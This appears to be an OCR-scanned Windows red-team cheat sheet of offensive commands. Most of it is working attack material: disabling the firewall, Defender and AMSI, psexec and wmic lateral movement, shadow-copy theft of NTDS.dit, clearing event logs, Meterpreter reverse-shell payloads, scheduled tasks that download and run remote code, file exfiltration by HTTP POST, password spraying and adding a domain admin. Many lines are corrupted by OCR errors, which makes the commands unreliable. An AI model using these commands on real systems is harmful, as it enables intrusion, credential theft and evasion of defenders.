Windows

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

%SystemDrive%\wmiOWS\Start Menu\Programs\Startup

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

rundll32.dll user32.dll LockWorkstation

netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=l.l.l.l

reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f

psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe

psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1

psexec /accepteula \\ ip -s cmd.exe

Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService 
"fDenyTSCo~nections"=dword: 00000000
reg import reg file. reg 
net start ''terrnservice'' 
sc config terrnservice start= auto 
net start terrnservice 

    --OR--
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f 

reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f 

netsh firewall set service type = remotedesktop mode = enable 

schtasks.exe /create /tn t1yTask /xml "C:\MyTask.xml" /f

[alias] == process, share, startup, service, nicconfig, useraccount, etc. 
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc. 
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method], delete

wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP \share\evil.exe" 

wmic product get name /value # Get software names 
wmic product where name="XXX" call uninstall /nointeractive 

wmic /node:remotecomputer computersystern get username 

wmic /node:machinename process list brief /every:l 

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where 
AllowTSConnections=''O'' call SetAllowTSConnections ''1''

wmic netlogin where (name like "%adm%") get numberoflogons 

wmic service get narne,displayname,pathnarne,startrnode 
| findstr /i nauton | findstr /i /v "C:\windows\\" | findstr /i /v """

1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS" process 
   call create "cmd /c vssadmin list shadows 2 &1 
   c:\temp\output.txt" 
# If any copies alread1 ex~st then exfil, otherwise create using 
following commands. Check output.txt for anJ errors 
2. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process 
   call create "cmd /c vssadmin create shadow /for=C: 2 &1 
   C:\temp\output.txt" 
3. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process 
   call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co nfig\SYSTEM 
   C:\temp\system.hive 2 &1  
   C:\temp\output.txt" 
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: "PASS" process call create ''cmd /c copy 
   \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit 
   C:\temp\ntds.dit 2 &1 C:\temp\output.txt" 
Step by step instructions on room362.com for step below 
5. From Linux, download and run ntdsxtract and libesedb to export 
   hashes or other domain information 
   a. Additional instructions found under the VSSOWN section 
   b. ntdsxtract - http://www.ntdsxtract.com 
   c. libesedb - http://code.google.com/p/libesedb/ 

Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out

https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass

powershell -command set-mpppreference -Disable realtimemonitoring $true

$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()

$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()

Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1

Get-EventLog -list 
Clear-EventLog -logname Application, Security -computername SVR01 

Get-WmiObject -class win32 operatingsystem | select -property ' | 
export-csv c:\os.txt

Get-Service | where_object {$_.status -eq "Running"} 

New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i 

Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"} 

(new-object sjstem.net.webclient).downloadFile(''url'',''dest'')

$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {try
($socket=New-object Sjstem.Net.Sockets.TCPClient($ip,$port); }catch(};
if ($socket -eq $NULL) (echo $ip":"$port"- Closed";}
else(echo $ip":"$port"- Open";$socket =$NULL;}}

$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send(''ip'',5JO)

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential(" title "," message "," user" "," domain")

powershell. exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match
'201308 ( 0 [ 8-9] |1 [0-1])-(0[ 8-9]]|1 [ 0-7]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"

$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'

𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙 𝑖𝑤𝑟 − 𝑢𝑠𝑒𝑏𝑎𝑠𝑖𝑐𝑝𝑎𝑟𝑠𝑖𝑛𝑔 ℎ𝑡𝑡𝑝://192.168.2. 𝑥/𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥𝑒 − 𝑂𝑢𝑡𝐹𝑖𝑙𝑒 − 𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥e

powershell.exe Send-l-1ai1Hessage -to "email" -from "email" -subject
"Subject" -a "attachment file path" -body "Body" -SmtpServer Target
Email Server IP

net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username

Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class 
MicrosoftDNS _ ResourceRecord -Filter "domainname~' DOMAIN '" | select 
textrepresentation 

powershell.exe -noprofile -noninteractive -command 
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback = 
{$true); $source="""https:ll YOUR SPECIFIED IP I file.zip """; 
$destination="C:\rnaster.zip"; $http = new-object Systern.Net.WebClient;
$response= $http.DownloadFile($source, $destination);" 

Script will send a file ($filepath) via http to server ($server) via POST request. 
Must have web server listening on port designated in the $server
 
powershell.exe -noprofile -noninteractive -command 
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback = 
{$true); $server="""http:// YOUR_SPECIFIED IP / folder """;
$filepath="C:\master.zip" $http= new=object System.Net.WebClient;
$response= $http.UploadFile($server,$filepath);" 

Need Metasploit v4.5+ (msfvenom supports Powershell) 
Use Powershell (x86) with 32 bit Meterpreter payloads 
encodeMeterpreter.psl script can be found on next page 

1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 audit.psl 
2. Move audit.psl into same folder as encodeMeterpreter.psl 
3. Launch Powershell (x86) 
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl 
5. Copy the encoded Meterpreter string

1. ./msfconsole 
2. use exploit/multi/handler 
3. set payload windows/meterpreter/reverse https 
4. set LHOST 1. 1. 1. 1 
5. set LPORT 443 
6. exploit -j 

1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter 
string here 
PROFIT 

# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand

1. msfpayload windows/rneterpreter/reverse tcp LHOST=10.1.1.1
LPORT~8080 R I msfencode -t psh -a x86

1. c:\powershell
2. PS c:\ $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j

1. c: \ powershell -noprofile -noninteracti ve -command " &
     {$client=new-object
     System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt
     ', 'c:\windows\temp\shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command " &
     {$crnd~tjpe 'c:\windows\temp\shell.txt';powershell -noprofilenoninteractive
     -noexit -encodedCornmand $cmd} "
PROFIT

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1

HKLM\Software\Microsoft\Windows NT\CurrentVersion

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot

HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU

HKLM\System\MountedDevices

HKLM\System\CurrentControlSet\Enurn\USBStor

HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1

HKEY LOCAL MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon

HKLM\Security\Policy\PolAdTev

HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

HKLM\Software

HKCU\Software

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu

HKCU\Software\Microsoft\Internet Explorer\TypedURLs

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeY

HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

dsquery user -limit 0

dsquery group "cn=users, dc=victim, dc=com"

dsquery group -name "domain admins" | dsget group -members -expand

dsquery user -name bob | dsget user -memberof -expand

dsquery user -name bob | dsget user -samid

dsquery user - inactive 2

dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpassdisplaj
"Bob" -pwdneverexpires yes -memberof "CN=Domain
Admins,CN=Users,DC=victim,DC=com

dsrm -subtree -noprornpt "CN=Bob,CN=Users,DC=victim,DC=com"

dsquery A "DC=victim,DC=com" -scope subtree -attr "en" "operatingSystem"
"operatingSystemServicePack" -filter
" (& (objectclass=computer) (objectcategory=computer) (operatingSystem=Windows}
))"

dsquery site -o rdn -limit 0

dsquery subnet -site sitename -o rdn

dsquery server -site sitename -or rdn

dsquery ' domainroot -filter
" (& (objectCategory=Computer) (objectClass=Computer) (operatingSystem='Server'
) ) "-limit 0

dsquery "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter
(objectCategory=Server)

for /L %i in (10,1,254) do@ (for /L %x in (10,1,254) do@ ping -n 1 -w 100
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x live.txt)

for /F %i in (file) do command

for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$ NUL

@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN-
1234\c$ /USER:%%U wrong pass

for /L %i
1.1.1.%i
in (2,1,254) do (netsh interface ip set address local static
netrask gw ID %1 ping 127.0.0.1 -n l -w 10000 nul %1)

for /L %i in (100, 1, 105)
dns.txt && echo Server:
do @ nslookup 1.1.1.%i I findstr /i /c:''Name''
1.1.1.%i dns.txt

forfi1es /P c:\temp /s /m pass -c "cmd /c echo @isdir @fdate @ftime
@relpath @path @fsize"

# Run packet capture on attack domain to receive callout
# domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain NUL 2 &1 & ping -n 5 127.0.0.1 NUL 2 &1

for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com
www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe

for /f "tokens=2 delims='='" %a in ('wmic service list full | find /i
"pathname" I find /i /v "system32"') do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = " delims = " %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe
/c icacls ''%a''

for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot
message"

# Create .vbs script with the following
Set shell wscript.createobject("wscript.shell")
Shell.run "runas /user: user " & """" &
C:\Windows\System32\WindowsPowershell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c \" & """" & "IEX ((New-
Object Net.WEbClieil':).downloadstring(' url '))\" & """" & """"
wscript.sleep(100)
shell.Sendkeys "password" & "{ENTER}"

Scheduled tasks binary paths CANNOT contain spaces because everything
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"

SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN/user /RP
password

For 64 bit use:
"C:\Windows\syswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring( ''http:// ip : port I payload'''))'' /SC
onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onidle /i 30

smbclient -L 10.10.10.10 -U tlevel

smbclient -N -L 10.10.10.10

smbpasswd -r 10.10.10.10 -U tlevel

smbclient -L 10.10.10.10

smbclient //10.10.10.10/forensic

smbclient //10.10.10.10/profiles$

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 10.10.10.10L -usersfile

msf5 > use auxiliary/scanner/smb/smb_login
set pass_file wordlist
set USER_file users.txt
set RHOSTS 10.10.10.10
run

medusa -h 10.10.10.10 -U users.txt -P wordlist -M smbnt

rpcclient 10.10.10.10 -U support

queryuser support

enumdomusers

enumprivs

setuserinfo2 audit2020 23 'redteam'

enumprinters

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -
hashes lmhash:nthash LOCAL -output nt-hash

https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe
or
SharpHound.exe -c All --zipfilename output.zip

https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast

for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.

https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
.\PortScan.ps1
.\PortScan.ps1 10.10.10.10 1 10000

PS> Test-WSMan -ComputerName <COMPUTERNAME> -Port 6666

𝐺𝑒𝑡 − 𝑁𝑒𝑡𝑂𝑈 − 𝑣𝑒𝑟𝑏𝑜𝑠𝑒

𝐺𝑒𝑡 − 𝐷𝑜𝑚𝑎𝑖𝑛𝑈𝑠𝑒𝑟 − 𝑆𝑒𝑎𝑟𝑐ℎ𝐵𝑎𝑠𝑒 "𝐿𝐷𝐴𝑃://𝑂𝑈 = 𝐼𝐶𝑆,𝐷𝐶 = 𝑛𝑢𝑐𝑙𝑒𝑎𝑟,𝐷𝐶 = 𝑠𝑖𝑡𝑒" − 𝑉𝑒𝑟𝑏𝑜𝑠𝑒

SharpHound.exe --CollectionMethod all

𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜. 𝑒𝑥𝑒 𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 −u 
𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜. 𝑒𝑥𝑒 𝑒𝑥𝑒𝑐𝑢𝑡𝑒 − 𝑐 "𝑁𝑈𝐶𝐿𝐸𝐴𝑅\𝑣𝑑𝑎𝑑𝑚𝑖𝑛" 𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\𝑏𝑖𝑛𝑎𝑟𝑦.𝑒𝑥e